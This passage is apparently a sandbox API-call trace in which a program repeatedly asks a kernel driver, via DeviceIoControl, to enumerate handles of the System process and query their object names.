PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.726] ObReferenceObjectByHandle (in: Handle=0xffffffff8000019c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003429d20, HandleInformation=0x0) returned 0x0 [0198.727] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.727] PsReleaseProcessExitSynchronization () returned 0x2 [0198.727] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.727] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.727] ObfDereferenceObject (Object=0xfffffa8003429d20) returned 0x1 [0198.727] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.727] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.727] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.727] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x62, lpOverlapped=0x0) returned 1 [0198.727] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.727] PsAcquireProcessExitSynchronization () returned 0x0 [0198.727] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.727] ObReferenceObjectByHandle (in: Handle=0xffffffff800001a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003429f20, HandleInformation=0x0) returned 0x0 [0198.727] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.727] PsReleaseProcessExitSynchronization () returned 0x2 [0198.727] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.727] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.727] ObfDereferenceObject (Object=0xfffffa8003429f20) returned 0x1 [0198.728] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.728] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.728] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.728] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x52, lpOverlapped=0x0) returned 1 [0198.728] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.728] PsAcquireProcessExitSynchronization () returned 0x0 [0198.728] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.728] ObReferenceObjectByHandle (in: Handle=0xffffffff800001b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034469d0, HandleInformation=0x0) returned 0x0 [0198.728] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.728] PsReleaseProcessExitSynchronization () returned 0x2 [0198.728] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.728] ObQueryNameString (in: Object=0xfffffa80034469d0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.728] ObfDereferenceObject (Object=0xfffffa80034469d0) returned 0x3 [0198.728] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.729] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.729] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.729] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0198.729] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.729] PsAcquireProcessExitSynchronization () returned 0x0 [0198.729] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.729] ObReferenceObjectByHandle (in: Handle=0xffffffff800001b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002cfd840, HandleInformation=0x0) returned 0x0 [0198.729] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.729] PsReleaseProcessExitSynchronization () returned 0x2 [0198.729] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.729] ObQueryNameString (in: Object=0xfffffa8002cfd840, ObjectNameInfo=0xfffffa8003162044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003162044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.729] ObfDereferenceObject (Object=0xfffffa8002cfd840) returned 0x1 [0198.729] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.729] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.730] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.730] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0198.730] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.730] PsAcquireProcessExitSynchronization () returned 0x0 [0198.730] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.730] ObReferenceObjectByHandle (in: Handle=0xffffffff800001b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800343f8f0, HandleInformation=0x0) returned 0x0 [0198.730] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.730] PsReleaseProcessExitSynchronization () returned 0x2 [0198.730] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.730] ObQueryNameString (in: Object=0xfffffa800343f8f0, ObjectNameInfo=0xfffffa8003131044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003131044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.730] ObfDereferenceObject (Object=0xfffffa800343f8f0) returned 0x1 [0198.730] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.730] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.730] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.730] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0198.730] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.730] PsAcquireProcessExitSynchronization () returned 0x0 [0198.731] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.731] ObReferenceObjectByHandle (in: Handle=0xffffffff800001bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003435830, HandleInformation=0x0) returned 0x0 [0198.731] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.731] PsReleaseProcessExitSynchronization () returned 0x2 [0198.731] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.731] ObQueryNameString (in: Object=0xfffffa8003435830, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.731] ObfDereferenceObject (Object=0xfffffa8003435830) returned 0x1 [0198.731] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.731] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.731] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.731] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0198.731] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.731] PsAcquireProcessExitSynchronization () returned 0x0 [0198.731] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.731] ObReferenceObjectByHandle (in: Handle=0xffffffff800001c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002ec5560, HandleInformation=0x0) returned 0x0 [0198.731] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.731] PsReleaseProcessExitSynchronization () returned 0x2 [0198.731] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.732] ObQueryNameString (in: Object=0xfffffa8002ec5560, ObjectNameInfo=0xfffffa800313e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800313e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.732] ObfDereferenceObject (Object=0xfffffa8002ec5560) returned 0x1 [0198.732] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.732] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.732] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.732] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0198.732] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.732] PsAcquireProcessExitSynchronization () returned 0x0 [0198.732] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.732] ObReferenceObjectByHandle (in: Handle=0xffffffff800001c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa801152f050, HandleInformation=0x0) returned 0x0 [0198.732] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.732] PsReleaseProcessExitSynchronization () returned 0x2 [0198.732] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.732] ObQueryNameString (in: Object=0xfffffa801152f050, ObjectNameInfo=0xfffffa8003144044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003144044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.732] ObfDereferenceObject (Object=0xfffffa801152f050) returned 0x1 [0198.732] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.732] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.733] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.733] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0198.733] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.733] PsAcquireProcessExitSynchronization () returned 0x0 [0198.733] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.733] ObReferenceObjectByHandle (in: Handle=0xffffffff800001c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8011951f20, HandleInformation=0x0) returned 0x0 [0198.733] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.733] PsReleaseProcessExitSynchronization () returned 0x2 [0198.733] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.733] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003147044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003147044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.733] ObfDereferenceObject (Object=0xfffffa8011951f20) returned 0x1 [0198.733] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.733] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.733] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.733] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xcc, lpOverlapped=0x0) returned 1 [0198.733] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.733] PsAcquireProcessExitSynchronization () returned 0x0 [0198.734] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.734] ObReferenceObjectByHandle (in: Handle=0xffffffff800001cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003442b90, HandleInformation=0x0) returned 0x0 [0198.734] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.734] PsReleaseProcessExitSynchronization () returned 0x2 [0198.734] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.734] ObQueryNameString (in: Object=0xfffffa8003442b90, ObjectNameInfo=0xfffffa8003148044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003148044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.734] ObfDereferenceObject (Object=0xfffffa8003442b90) returned 0x2 [0198.734] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.734] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.734] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.734] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0198.734] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.734] PsAcquireProcessExitSynchronization () returned 0x0 [0198.735] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.735] ObReferenceObjectByHandle (in: Handle=0xffffffff800001d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800343f570, HandleInformation=0x0) returned 0x0 [0198.735] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.735] PsReleaseProcessExitSynchronization () returned 0x2 [0198.735] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.735] ObQueryNameString (in: Object=0xfffffa800343f570, ObjectNameInfo=0xfffffa800314b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800314b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.735] ObfDereferenceObject (Object=0xfffffa800343f570) returned 0x2 [0198.735] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.735] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.735] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.735] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x116, lpOverlapped=0x0) returned 1 [0198.735] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.735] PsAcquireProcessExitSynchronization () returned 0x0 [0198.735] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.735] ObReferenceObjectByHandle (in: Handle=0xffffffff800001d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003436240, HandleInformation=0x0) returned 0x0 [0198.735] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.735] PsReleaseProcessExitSynchronization () returned 0x2 [0198.736] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.736] ObQueryNameString (in: Object=0xfffffa8003436240, ObjectNameInfo=0xfffffa800314f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800314f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.736] ObfDereferenceObject (Object=0xfffffa8003436240) returned 0x2 [0198.736] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.736] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.736] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.736] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0198.736] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.736] PsAcquireProcessExitSynchronization () returned 0x0 [0198.736] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.736] ObReferenceObjectByHandle (in: Handle=0xffffffff800001dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003434bf0, HandleInformation=0x0) returned 0x0 [0198.736] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.736] PsReleaseProcessExitSynchronization () returned 0x2 [0198.736] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.736] ObQueryNameString (in: Object=0xfffffa8003434bf0, ObjectNameInfo=0xfffffa8003150044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003150044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.737] ObfDereferenceObject (Object=0xfffffa8003434bf0) returned 0x1 [0198.737] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.737] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.737] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.737] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0198.737] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.737] PsAcquireProcessExitSynchronization () returned 0x0 [0198.737] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.737] ObReferenceObjectByHandle (in: Handle=0xffffffff800001e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003441aa0, HandleInformation=0x0) returned 0x0 [0198.737] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.737] PsReleaseProcessExitSynchronization () returned 0x2 [0198.737] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.737] ObQueryNameString (in: Object=0xfffffa8003441aa0, ObjectNameInfo=0xfffffa8003152044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003152044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.737] ObfDereferenceObject (Object=0xfffffa8003441aa0) returned 0x2 [0198.737] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.738] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.738] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.738] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0198.738] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.738] PsAcquireProcessExitSynchronization () returned 0x0 [0198.738] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.738] ObReferenceObjectByHandle (in: Handle=0xffffffff800001ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80035257d0, HandleInformation=0x0) returned 0x0 [0198.738] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.738] PsReleaseProcessExitSynchronization () returned 0x2 [0198.738] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.738] ObQueryNameString (in: Object=0xfffffa80035257d0, ObjectNameInfo=0xfffffa8003153044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003153044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.739] ObfDereferenceObject (Object=0xfffffa80035257d0) returned 0x2 [0198.739] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.739] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.739] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.739] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0198.739] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.739] PsAcquireProcessExitSynchronization () returned 0x0 [0198.739] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.739] ObReferenceObjectByHandle (in: Handle=0xffffffff800001f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800352a560, HandleInformation=0x0) returned 0x0 [0198.739] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.739] PsReleaseProcessExitSynchronization () returned 0x2 [0198.740] ObfDereferenceObject 